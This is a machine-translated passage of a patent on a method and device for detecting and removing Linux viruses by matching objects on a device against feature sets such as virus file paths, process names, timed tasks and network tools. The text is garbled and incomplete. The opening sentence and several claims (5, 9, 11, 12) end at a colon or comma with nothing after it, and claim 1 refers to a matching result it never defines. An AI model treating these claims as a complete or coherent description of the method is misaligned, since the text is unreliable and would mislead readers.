Further, after traversing the sample shell script and taking the traversed sample shell script as the current sample shell script, the virus killing program further realizes the following operations when being executed by the processor:

It should be noted that, in this document, the terms "comprises," "comprising," or any other variation thereof, are intended to cover a non-exclusive inclusion, such that a process, method, article, or system that comprises a list of elements does not include only those elements but may include other elements not expressly listed or inherent to such process, method, article, or system. Without further limitation, an element defined by the phrase "comprising one … …" does not exclude the presence of other like elements in a process, method, article, or system that comprises the element.

The foregoing embodiment numbers of the present invention are merely for the purpose of description, and do not represent the advantages or disadvantages of the embodiments.

From the above description of the embodiments, it will be clear to those skilled in the art that the above-described embodiment method may be implemented by means of software plus a necessary general hardware platform, but of course may also be implemented by means of hardware, but in many cases the former is a preferred embodiment. Based on such understanding, the technical solution of the present invention may be embodied essentially or in a part contributing to the prior art in the form of a software product stored in a storage medium (e.g. ROM/RAM, magnetic disk, optical disk) as described above, including several instructions for causing a server (which may be a mobile phone, a computer, a server, an air conditioner, or a network device, etc.) to perform the method according to the embodiments of the present invention.

The foregoing description is only of the preferred embodiments of the present invention, and is not intended to limit the scope of the invention, but rather is intended to cover any equivalents of the structures or equivalent processes disclosed herein or in the alternative, which may be employed directly or indirectly in other related arts.

Claims

1. The virus killing method is characterized by comprising the following steps of:

acquiring an object set to be detected in equipment to be detected, wherein the equipment to be detected is equipment needing Linux virus detection;

when the first matching result is that the matching is successful, the virus exists in the equipment to be detected, and the virus in the equipment to be detected is cleared;

the first feature item set includes: virus file path characteristics;

obtaining virus file path characteristics based on the first character string, and adding the virus file path characteristics into a first characteristic item set;

The deriving virus file path characteristics based on the first string includes,

judging whether the first character string contains preset characters or not;

2. The virus killing method of claim 1, wherein the first set of feature items comprises: virus process name characteristics;

3. The virus killing method of claim 1, wherein the first set of feature items comprises: timing task features;

4. The virus killing method of claim 1, wherein the first set of feature items comprises: network connection tool features;

5. The method of claim 1, wherein said matching the set of objects to be detected with the first set of feature items comprises,

6. The virus killing method of claim 5, wherein the second set of feature items comprises: the virus file name feature is used for clearing other viruses;

7. The virus killing method of claim 5, wherein the second set of feature items comprises: the virus process name features are used for eliminating other viruses;

8. The virus killing method of claim 5, wherein the second set of feature items comprises: monitoring port characteristics;

9. The virus killing method of claim 8, wherein said deriving a snoop port feature based on said seventh string comprises,

10. The virus killing method of claim 5, wherein the second set of feature items comprises: communication tool features;

11. The method for virus detection and killing according to any one of claims 1 to 10, wherein the removing of the virus in the device to be detected includes,

12. The virus killing method according to any one of claims 2 to 4 and 6 to 10, wherein after traversing the sample shell script and taking the traversed sample shell script as the current sample shell script, comprising,

13. A virus killing device, characterized in that the virus killing device comprises: a memory, a processor and a virus killing program stored on the memory and executable on the processor, the virus killing program configured to implement the steps of the virus killing method of any one of claims 1 to 12.

14. A computer-readable storage medium, wherein a virus killing program is stored on the computer-readable storage medium, which when executed by a processor, implements the steps of the virus killing method according to any one of claims 1 to 12.